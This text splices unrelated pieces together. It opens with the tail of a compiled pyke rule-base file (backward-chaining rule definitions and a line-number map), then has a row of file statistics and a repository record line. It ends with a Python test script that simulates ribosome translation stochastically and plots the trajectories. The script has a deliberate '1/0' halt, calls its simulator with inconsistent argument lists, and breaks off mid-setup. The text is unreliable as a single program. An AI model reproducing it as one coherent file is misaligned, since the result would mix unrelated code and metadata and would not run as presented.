pattern.pattern_literal(()),),
(),
(contexts.variable('fn_head'),))
bc_rule.bc_rule('as_plan', This_rule_base, 'gen_plan_lines',
as_plan, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('as'), contexts.variable('pat_var_name'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
pattern.pattern_literal(()),
pattern.pattern_literal(()),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('pat_var_name'),
contexts.variable('pat_num'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('plan_spec', This_rule_base, 'gen_plan_lines',
plan_spec, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('plan_spec'), contexts.variable('step_num'), contexts.variable('plan_var_name'), contexts.variable('python_code'), contexts.variable('plan_vars_needed'), contexts.anonymous('_'), contexts.anonymous('_'),), None),
pattern.pattern_literal(True),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
pattern.pattern_tuple((pattern.pattern_tuple((contexts.variable('step_num'), contexts.variable('python_code'),), None),), None),
contexts.variable('plan_vars_needed'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('plan_var_name'),
contexts.variable('pat_num'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('illegal_plan_spec', This_rule_base, 'gen_plan_lines',
illegal_plan_spec, None,
(contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
pattern.pattern_tuple((pattern.pattern_literal('plan_spec'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.variable('lineno'), contexts.variable('lexpos'),), None),
pattern.pattern_literal(False),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),),
(),
(contexts.anonymous('_'),))
bc_rule.bc_rule('plan_bindings', This_rule_base, 'plan_bindings',
plan_bindings, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('plan_var_name'),
contexts.variable('pat_num'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('not_required', This_rule_base, 'add_required',
not_required, None,
(pattern.pattern_literal(False),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.anonymous('_'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
())
bc_rule.bc_rule('required', This_rule_base, 'add_required',
required, None,
(pattern.pattern_literal(True),
contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('fn_head1'),
contexts.variable('fn_tail1'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('bc_python_premise', This_rule_base, 'bc_premise',
bc_python_premise, None,
(contexts.variable('rb_name'),
contexts.variable('rule_name'),
contexts.variable('clause_num'),
contexts.variable('next_clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('plan_var_names'),
contexts.variable('plan_var_names'),
pattern.pattern_literal(()),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(contexts.variable('next_clause_num'),
contexts.variable('clause_num'),
contexts.variable('python_premise'),
contexts.variable('break_cond'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('python_eq', This_rule_base, 'python_premise',
python_eq, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_eq'), contexts.variable('pattern'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('python_code2'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('python_in', This_rule_base, 'python_premise',
python_in, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_in'), contexts.variable('pattern'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.variable('break_cond'),
contexts.variable('patterns_in'),
contexts.variable('patterns_out'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),),
(),
(pattern.pattern_tuple((contexts.variable('pat_num'), contexts.variable('patterns_out'),), None),
contexts.variable('python_code2'),
contexts.variable('fn_head'),
contexts.variable('fn_tail'),))
bc_rule.bc_rule('python_check', This_rule_base, 'python_premise',
python_check, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_check'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),
contexts.variable('fn_head'),
pattern.pattern_literal(('POPINDENT',)),),
(),
(contexts.variable('python_code2'),
contexts.variable('fn_head'),))
bc_rule.bc_rule('python_block', This_rule_base, 'python_premise',
python_block, None,
(contexts.variable('clause_num'),
pattern.pattern_tuple((pattern.pattern_literal('python_block'), pattern.pattern_tuple((contexts.variable('python_code'), contexts.anonymous('_'), contexts.anonymous('_'), contexts.anonymous('_'),), None), contexts.variable('start_lineno'), contexts.variable('end_lineno'),), None),
contexts.anonymous('_'),
contexts.variable('patterns_in'),
contexts.variable('patterns_in'),
pattern.pattern_tuple((pattern.pattern_tuple((pattern.pattern_literal('STARTING_LINENO'), contexts.variable('start_lineno'),), None), contexts.variable('python_code'), pattern.pattern_tuple((pattern.pattern_literal('ENDING_LINENO'), contexts.variable('end_lineno'),), None),), None),
pattern.pattern_literal(()),),
(),
())
from pyke.krb_compiler import helpers
Krb_filename = '../compiler.krb'
Krb_lineno_map = (
((16, 20), (24, 28)),
((24, 24), (30, 30)),
((28, 28), (31, 31)),
((32, 32), (32, 32)),
((35, 43), (33, 33)),
((45, 53), (34, 34)),
((55, 65), (35, 36)),
((68, 80), (37, 49)),
((84, 89), (50, 55)),
((93, 108), (56, 71)),
((140, 144), (74, 74)),
((148, 148), (76, 76)),
((164, 168), (79, 79)),
((172, 174), (81, 83)),
((190, 194), (86, 86)),
((196, 197), (88, 90)),
((200, 200), (92, 92)),
((206, 214), (94, 94)),
((215, 216), (95, 97)),
((229, 229), (98, 98)),
((233, 233), (99, 99)),
((251, 255), (102, 103)),
((258, 276), (105, 107)),
((278, 287), (108, 109)),
((290, 307), (110, 127)),
((311, 318), (128, 135)),
((340, 344), (138, 139)),
((358, 362), (142, 146)),
((365, 383), (148, 152)),
((385, 403), (153, 157)),
((406, 406), (158, 158)),
((426, 430), (161, 167)),
((432, 443), (169, 170)),
((446, 449), (171, 174)),
((453, 453), (175, 175)),
((457, 457), (176, 176)),
((461, 466), (177, 182)),
((488, 492), (185, 186)),
((496, 511), (188, 203)),
((527, 531), (207, 208)),
((535, 545), (210, 220)),
((561, 565), (223, 227)),
((569, 569), (229, 229)),
((572, 590), (230, 234)),
((593, 593), (235, 235)),
((597, 597), (236, 236)),
((619, 623), (239, 242)),
((626, 644), (244, 248)),
((647, 647), (249, 249)),
((665, 669), (252, 256)),
((673, 673), (258, 258)),
((677, 677), (259, 259)),
((680, 698), (260, 264)),
((700, 718), (265, 269)),
((721, 729), (270, 278)),
((733, 733), (279, 279)),
((759, 763), (282, 286)),
((767, 767), (288, 288)),
((771, 771), (289, 289)),
((774, 792), (290, 294)),
((795, 800), (295, 300)),
((822, 826), (303, 306)),
((830, 830), (308, 308)),
((832, 843), (309, 311)),
((858, 862), (314, 314)),
((876, 880), (317, 318)),
((883, 892), (320, 320)),
((894, 903), (321, 321)),
((920, 924), (324, 326)),
((928, 929), (328, 329)),
((933, 942), (330, 339)),
((960, 964), (342, 347)),
((978, 982), (350, 350)),
((984, 986), (352, 355)),
((989, 989), (357, 357)),
((995, 1005), (359, 359)),
((1006, 1008), (360, 363)),
((1021, 1021), (364, 364)),
((1025, 1025), (365, 365)),
((1029, 1029), (366, 366)),
((1049, 1053), (369, 371)),
((1056, 1069), (373, 375)),
((1072, 1074), (376, 378)),
((1078, 1085), (379, 386)),
((1089, 1092), (387, 390)),
((1114, 1118), (393, 395)),
((1121, 1140), (397, 400)),
((1143, 1143), (401, 401)),
((1147, 1150), (402, 405)),
((1154, 1159), (406, 411)),
((1181, 1185), (414, 416)),
((1199, 1203), (419, 423)),
((1206, 1225), (425, 429)),
((1227, 1246), (430, 434)),
((1249, 1249), (435, 435)),
((1253, 1253), (436, 436)),
((1257, 1257), (437, 437)),
((1281, 1285), (440, 446)),
((1289, 1289), (448, 448)),
((1293, 1293), (449, 449)),
((1297, 1298), (450, 451)),
((1302, 1314), (452, 464)),
((1317, 1330), (465, 466)),
((1332, 1348), (467, 470)),
((1351, 1352), (471, 472)),
((1356, 1356), (473, 473)),
((1360, 1363), (474, 477)),
((1395, 1399), (480, 484)),
((1403, 1403), (486, 486)),
((1406, 1425), (487, 491)),
((1427, 1440), (492, 493)),
((1443, 1443), (494, 494)),
((1447, 1447), (495, 495)),
((1471, 1475), (498, 502)),
((1478, 1497), (504, 508)),
((1500, 1500), (509, 509)),
((1518, 1522), (512, 516)),
((1526, 1526), (518, 518)),
((1530, 1530), (519, 519)),
((1533, 1552), (520, 524)),
((1554, 1573), (525, 529)),
((1576, 1584), (530, 538)),
((1608, 1612), (541, 545)),
((1616, 1616), (548, 548)),
((1620, 1620), (549, 549)),
((1623, 1642), (550, 554)),
((1645, 1650), (555, 560)),
((1672, 1676), (563, 565)),
((1680, 1687), (567, 574)),
((1703, 1707), (577, 581)),
((1711, 1713), (583, 585)),
((1716, 1728), (586, 587)),
((1745, 1749), (590, 595)),
((1753, 1755), (597, 599)),
((1758, 1770), (600, 601)),
((1787, 1791), (604, 606)),
((1795, 1796), (608, 609)),
((1812, 1816), (612, 613)),
((1820, 1840), (615, 635)),
((1844, 1844), (636, 636)),
((1862, 1866), (639, 640)),
((1880, 1884), (643, 644)),
((1888, 1891), (646, 649)),
((1895, 1901), (650, 656)),
((1919, 1923), (659, 663)),
((1927, 1927), (665, 665)),
((1929, 1940), (666, 668)),
((1955, 1959), (671, 675)),
((1963, 1964), (677, 678)),
((1968, 1968), (679, 679)),
((1972, 1982), (680, 690)),
((1986, 1988), (691, 693)),
((2010, 2014), (696, 700)),
((2018, 2019), (702, 703)),
((2023, 2023), (704, 704)),
((2027, 2039), (705, 717)),
((2043, 2052), (718, 727)),
((2074, 2078), (730, 735)),
((2082, 2082), (737, 737)),
((2086, 2093), (738, 745)),
((2111, 2115), (748, 756)),
)
| 47.626959 | 351 | 0.501126 | 15,078 | 151,930 | 4.772251 | 0.049144 | 0.15654 | 0.052449 | 0.0404 | 0.929916 | 0.913683 | 0.879204 | 0.849186 | 0.825393 | 0.806854 | 0 | 0.036353 | 0.385671 | 151,930 | 3,189 | 352 | 47.641894 | 0.73459 | 0.000092 | 0 | 0.79168 | 0 | 0 | 0.115954 | 0.010197 | 0 | 0 | 0 | 0 | 0.030313 | 1 | 0.013544 | false | 0 | 0.001612 | 0 | 0.015156 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8fa52a16a911f72fc18439a3042230b1c92bdca4 | 17,112 | py | Python | rsnapsim/defunct/generalized_cpp/test_translation_ssa_generic_lowmem.py | MunskyGroup/rSNAPsim | af3e496d5252e1d2e1da061277123233a5d609b4 | [
"MIT"
] | 1 | 2022-01-28T18:17:37.000Z | 2022-01-28T18:17:37.000Z | rsnapsim/defunct/generalized_cpp/test_translation_ssa_generic_lowmem.py | MunskyGroup/rSNAPsim | af3e496d5252e1d2e1da061277123233a5d609b4 | [
"MIT"
] | null | null | null | rsnapsim/defunct/generalized_cpp/test_translation_ssa_generic_lowmem.py | MunskyGroup/rSNAPsim | af3e496d5252e1d2e1da061277123233a5d609b4 | [
"MIT"
] | 1 | 2020-12-02T06:36:17.000Z | 2020-12-02T06:36:17.000Z | # -*- coding: utf-8 -*-
"""
Created on Fri Mar 27 18:07:30 2020
@author: willi
"""
#Test file for generalized SSA
#import rSNAPsim as rss
import numpy as np
import time
import matplotlib.pyplot as plt
import ssa_translation_generic_lowmem
def generate_additional_ks(enters,pauses,jumps,stops,L):
def frame_check_1(L,arr):
return (L- arr[:,1]+1)*(arr[:,1]>0) + L*(arr[:,1]>1)
def frame_check_3(L,arr):
return (L- arr[:,3]+1)*(arr[:,3]>0) + L*(arr[:,3]>1)
def gen_ks_1_loc(L,arr):
arr[:,0] = arr[:,0]+frame_check_1(L,arr)
arr[:,1] = arr[:,2]
arr = arr[:,0:2]
max_arr = np.max( arr[:,0])
return arr,max_arr
def gen_ks_3_loc(L,arr):
arr[:,0] = arr[:,0]+ frame_check_1(L,arr)
arr[:,1] = arr[:,2]+ frame_check_3(L,arr)
arr[:,2] = arr[:,4]
arr = arr[:,0:3]
max_arr = max([np.max( arr[:,0]),np.max( arr[:,1])])
return arr,max_arr
max_enter = 0
max_pause = 0
max_stop = 0
max_jump = 0
k_jumps = np.copy(jumps)
k_pauses = np.copy(pauses)
k_stops = np.copy(stops)
k_enters = np.copy(enters)
if len(k_enters) != 0:
k_enters,max_enter = gen_ks_1_loc(L,k_enters)
if len(k_pauses) != 0:
k_pauses,max_pause = gen_ks_1_loc(L,k_pauses)
if len(k_stops) != 0:
k_stops,max_stop = gen_ks_1_loc(L,k_stops)
if len(k_jumps) != 0:
k_jumps,max_jump = gen_ks_3_loc(L,k_jumps)
max_loc = max(max_jump,max_stop,max_pause,max_enter)
if max_loc <=L:
frames_used = 0
if max_loc > L:
frames_used = 1
if max_loc > 2*L-1 :
frames_used = 2
return k_enters, k_pauses, k_stops, k_jumps, frames_used
#rsnap = rss.rSNAPsim()
#rsnap.open_seq_file('gene_files/H2B_withTags.txt')
#rsnap.run_default()
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[149]= 0
kelong[248] = 0
#k_fss = np.array([[200,0,200,1,.3]])
k_pause = np.array([[30,0,.005]])
k_enters = np.array([[5,0,.02],[5,2,.04]],dtype=np.float64)
k_stops = np.array([[50,0,10],[50,1,10],[50,2,10]],dtype=np.float64)
k_fss = np.array([[20,0,20,1,1]],dtype=np.float64)
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,[],k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 10
start = time.time()
all_results = np.zeros((n_trajectories,2,len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
t_array_copy = np.vstack((t_array_copy,t_array))
probe = np.zeros((298,2)).T
probe[0,10] = 1
probe[0,20] = 1
probe[1,225] = 1
probe[1,215] = 1
#probe = np.cumsum(probe,axis=1)
probe = probe.astype(int).copy(order='C')
for i in range(n_trajectories):
result = np.zeros((2,len(t_array)),dtype=np.int32)
frapresult = np.zeros((len(t_array)*N_rib),dtype=np.int32)
ssa_translation_generic_lowmem.run_SSA_generic(result, kelong,frapresult,t_array, np.array([0,0,0],dtype=np.float64), seeds[i], k_add.flatten() ,2,0,3,1, probe, 2,200 )
all_results[i,:,:] = result
all_frapresults[i,:] = frapresult
print(result.shape)
print(kelong.shape),
print(frapresult.shape)
print(k_add.flatten().shape)
print(probe.T.astype(int).shape)
traj = all_results[0,:,:].reshape((2,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 and +2,10 FSS: 0,20 to +1,20 Stops: 50 0,1,2' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
1/0
###################################################################
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 3
kelong[79] = 0
k_enters = np.array([[10,0,.04]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,0,10]],dtype=np.float64)
k_fss = []
k_pause = []
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
t_array_copy = np.vstack((t_array_copy,t_array))
for i in range(n_trajectories):
result = np.zeros((len(t_array)*N_rib),dtype=np.int32)
frapresult = np.zeros((len(t_array)*N_rib),dtype=np.int32)
ribtimes = np.zeros((400),dtype=np.float64)
coltimes = np.zeros((400),dtype=np.int32)
ssa_translation_generic_lowmem.run_SSA_generic(result,ribtimes,coltimes, kelong,frapresult,t_array, np.array([0,0,0],dtype=np.float64), seeds[i],nribs, k_add.flatten() ,len(k_enters),len(k_pauses),len(k_stops),len(k_jumps) )
all_results[i,:] = result
all_frapresults[i,:] = frapresult
all_coltimes[i,:] = coltimes
all_ribtimes[i,:] = ribtimes
all_ribs[i,:] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 stops: 0,50 and 0,80' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
#####################################################
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[179] = 0
k_enters = np.array([[10,0,.04]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,1,10]],dtype=np.float64)
k_fss = np.array([[30,0,30,1,1]],dtype=np.float64)
k_pause = []
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
t_array_copy = np.vstack((t_array_copy,t_array))
for i in range(n_trajectories):
result = np.zeros((len(t_array)*N_rib),dtype=np.int32)
frapresult = np.zeros((len(t_array)*N_rib),dtype=np.int32)
ribtimes = np.zeros((400),dtype=np.float64)
coltimes = np.zeros((400),dtype=np.int32)
ssa_translation_generic_lowmem.run_SSA_generic(result,ribtimes,coltimes, kelong,frapresult,t_array, np.array([0,0,0],dtype=np.float64), seeds[i],nribs, k_add.flatten() ,1,0,2,1 )
all_results[i,:] = result
all_frapresults[i,:] = frapresult
all_coltimes[i,:] = coltimes
all_ribtimes[i,:] = ribtimes
all_ribs[i,:] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 stops: 0,50 and 1,80 FSS: 0,30 to 1,30' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
######################
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[278] = 0
k_enters = np.array([[10,0,.04],[10,2,.02]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,2,10]],dtype=np.float64)
k_fss = []
k_pause = []
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
k_add = np.hstack((k_enters.flatten(),k_pauses.flatten(),k_stops.flatten(),k_jumps.flatten() ))
t_array_copy = np.copy(t_array)
while t_array_copy.shape[0] != 200:
t_array_copy = np.vstack((t_array_copy,t_array))
for i in range(n_trajectories):
result = np.zeros((len(t_array)*N_rib),dtype=np.int32)
frapresult = np.zeros((len(t_array)*N_rib),dtype=np.int32)
ribtimes = np.zeros((400),dtype=np.float64)
coltimes = np.zeros((400),dtype=np.int32)
ssa_translation_generic_lowmem.run_SSA_generic(result,ribtimes,coltimes, kelong,frapresult,t_array, np.array([0,0,0],dtype=np.float64), seeds[i],nribs, k_add.flatten() ,2,0,2,0 )
all_results[i,:] = result
all_frapresults[i,:] = frapresult
all_coltimes[i,:] = coltimes
all_ribtimes[i,:] = ribtimes
all_ribs[i,:] = nribs[0]
traj = all_results[0,:].reshape((N_rib,len(t_array))).T
f,ax = plt.subplots(2,1)
ax[0].set_ylim([0,300])
ax[0].fill_between([0,400],[100,100],color='red',alpha=.2)
ax[0].fill_between([0,400],[200,200],color='green',alpha=.2)
ax[0].fill_between([0,400],[300,300],color='blue',alpha=.2)
ax[0].plot(traj,'.')
ax[0].set_xlabel('Time')
ax[0].set_ylabel('Ribosome Location')
ax[0].set_title(' 100 codons, enters: 0,10 2,20 stops: 0,50 and 2,80' )
spatial_x = (traj + (traj > 100) + (traj > 199))%100
ax[1].set_ylim([0,100])
#ax[1].plot(t_array,spatial_x,'.')
ax[1].plot(t_array_copy.T[traj<=100],spatial_x[traj <= 100],'r.')
ax[1].plot(t_array_copy.T[traj>100],spatial_x[traj > 100],'g.')
ax[1].plot(t_array_copy.T[traj>199],spatial_x[traj > 199],'b.')
ax[1].set_xlabel('Time')
ax[1].set_ylabel('Ribosome Location')
ax[1].set_title(' spatial location ' )
ax[1].legend(['0','+1','+2'])
###########
k = np.ones((1,300)).flatten()
kelong = k[1:-1]
kelong[49] = 0
kelong[39] = 0.1
kelong[278] = 0
k_enters = np.array([[10,0,.04],[10,2,.02]],dtype=np.float64)
k_stops = np.array([[50,0,10],[80,2,10]],dtype=np.float64)
k_fss = []
k_pause = np.array([[40,0,100]],dtype=np.float64)
#k_pause = np.array([[30,2,100],[40,2,100]],dtype=np.float64)
k_enters,k_pauses,k_stops,k_jumps,frames_used = generate_additional_ks(k_enters,k_pause,k_fss,k_stops,100)
t_array = np.array([0,100,500],dtype=np.float64)
t0 = 15
t_array = np.linspace(0,400,400,dtype=np.float64)
N_rib = 200
result = np.zeros((len(t_array)*N_rib),dtype=np.int32 )
#kelong = np.array([3.1,3.2,3.3,3.4,3.5,3.1,3.2,3.3,3.4,3.5],dtype=np.float64)
n_trajectories = 1
start = time.time()
all_results = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
lenfrap = len(np.intersect1d(np.where(t_array>0)[0],np.where(t_array<20)[0]))
all_frapresults = np.zeros((n_trajectories,N_rib*len(t_array)),dtype=np.int32)
all_ribtimes = np.zeros((n_trajectories,400),dtype=np.float64)
all_coltimes = np.zeros((n_trajectories,400),dtype=np.int32)
nribs = np.array([0],dtype=np.int32)
all_ribs = np.zeros((n_trajectories,1))
seeds = np.random.randint(0,0x7FFFFFF,n_trajectories)
